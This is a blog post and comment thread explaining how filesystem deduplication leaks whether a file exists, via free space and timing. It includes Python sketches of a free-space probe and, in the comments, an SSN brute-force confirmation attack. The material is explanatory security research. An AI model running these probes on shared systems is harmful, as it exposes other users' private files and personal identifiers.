Filesystem deduplication is a sidechannel
Jul. 27th, 2020 12:25 pm
First off - nothing I'm going to talk about in this post is novel or overly surprising; I just haven't found a clear writeup of it before. I'm not criticising any design decisions or claiming this is an important issue, just raising something that people might otherwise be unaware of.
With that out of the way: Automatic deduplication of data is a feature of modern filesystems like zfs and btrfs. It takes two forms - inline, where the filesystem detects that data being written to disk is identical to data that already exists on disk and simply references the existing copy rather than writing a new one, and offline, where tooling retroactively identifies duplicated data and removes the duplicate copies (zfs supports inline deduplication; btrfs currently supports only offline deduplication). In a world where disks end up with multiple copies of cloud or container images, deduplication can free up significant amounts of disk space.
What's the security implication? The problem is that deduplication doesn't recognise ownership - if two users have copies of the same file, only one copy of the file will be stored[1]. So, if user a stores a file, the amount of free space will decrease. If user b stores another copy of the same file, the amount of free space will remain the same. If user b can check how much free space is available before and after the write, user b can determine whether a copy of that file already existed.
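To make that concrete, here's a rough sketch of what such a probe could look like - a minimal Python illustration, assuming inline deduplication is enabled, free space is reported promptly and nothing else is writing to the filesystem (in practice you'd need repeated measurements to cope with noise):

```python
import os

def file_already_existed(path, candidate):
    """Probe for an existing copy of `candidate` via free space.

    A minimal sketch, assuming inline deduplication is enabled and the
    filesystem is otherwise quiescent; a real probe would have to sync,
    wait and repeat measurements to deal with noise.
    """
    directory = os.path.dirname(path) or "."

    st = os.statvfs(directory)
    free_before = st.f_bavail * st.f_frsize

    with open(path, "wb") as f:
        f.write(candidate)
        os.fsync(f.fileno())
    os.sync()  # encourage the filesystem to commit (and deduplicate) the write

    st = os.statvfs(directory)
    free_after = st.f_bavail * st.f_frsize

    # A deduplicated write consumes almost no new space; a unique write
    # consumes roughly len(candidate) bytes plus metadata.
    return (free_before - free_after) < len(candidate) // 2
```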
This doesn't seem like a huge deal in most cases, but it is a violation of expected behaviour (if user b doesn't have permission to read user a's files, user b shouldn't be able to determine whether user a has a specific file). But we can come up with some convoluted cases where it becomes more relevant, such as law enforcement gaining unprivileged access to a system and then being able to demonstrate that a specific file already exists on that system. Perhaps more interestingly, it's been demonstrated that free space isn't the only sidechannel exposed by deduplication - deduplication has an impact on access timing, and can be used to infer the existence of data across virtual machine boundaries.
As I said, this is almost certainly not something that matters in most real world scenarios. But with so much discussion of CPU sidechannels over the past couple of years, it's interesting to think about what other features also end up leaking information in ways that may not be obvious.
(Edit to add: deduplication isn't enabled on zfs by default and is explicitly triggered on btrfs, so unless it's something you've enabled, this isn't something that affects you)
[1] Deduplication is usually done at the block level rather than the file level, but given zfs's support for variable sized blocks, identical files should be deduplicated even if they're smaller than the maximum record size.
Tahoe LAFS information confirmation attack
Date: 2020-07-28 01:31 am (UTC)
This came up in Tahoe's use of convergent encryption, which allows you to confirm some missing information. For example, if you know someone has a PDF template of a form which you know everything about except an SSN field, you can generate forms with all the SSNs and look for collisions, thereby confirming their SSN.
In this case, you could perform the same attack but look for dedups.
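A rough sketch of what that search could look like, reusing the file_already_existed probe sketched in the post above; render_template here is a hypothetical function that fills a guessed SSN into the otherwise-known template, and the exhaustive loop over every 9-digit SSN is purely illustrative:

```python
import os

def confirm_ssn(render_template, probe_path):
    # Hypothetical: render_template(ssn) returns the candidate PDF bytes
    # with that SSN filled into the otherwise-known template.
    for guess in range(1_000_000_000):
        candidate = render_template(f"{guess:09d}")
        if file_already_existed(probe_path, candidate):
            return guess  # this candidate deduplicated - SSN confirmed
        os.remove(probe_path)  # discard the non-matching copy
    return None
```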
Re: Tahoe LAFS information confirmation attack
Date: 2020-08-16 04:25 am (UTC)
So, using your example, if the SSN is in the last few bytes of a PDF containing a couple of big images that make it large enough to span multiple de-duplication blocks, you can infer its existence by detecting the de-duplication of the first block of the PDF.
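A sketch of that per-block variant, again reusing the hypothetical file_already_existed probe from the post above; the fixed 128KiB record size is an assumption (zfs's default recordsize), and real block alignment details will vary:

```python
RECORD_SIZE = 128 * 1024  # assumption: zfs's default recordsize of 128K

def prefix_already_existed(known_prefix, probe_path):
    # Only whole, aligned records can deduplicate against the target
    # file, so truncate the candidate to complete records - the trailing
    # partial record (holding the unknown bytes) is dropped anyway.
    whole = (len(known_prefix) // RECORD_SIZE) * RECORD_SIZE
    return file_already_existed(probe_path, known_prefix[:whole])
```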
side?
Date: 2020-07-30 03:24 am (UTC)
Re: side?
Date: 2020-08-02 11:48 pm (UTC)
So while an admin needs to be aware of this, it's a conscious choice to link two files and expose this information, at least on the Linux filesystems being discussed.
Google already notifies law enforcement automatically
Date: 2020-07-31 01:33 am (UTC)
They already have so much unfettered access to a person's data through automatic reports, backdoors, and, if the government chooses to go that route, a plain old subpoena.
A file system quirk that might hint that something is there if you already have access to the file system is a strange concern at that point.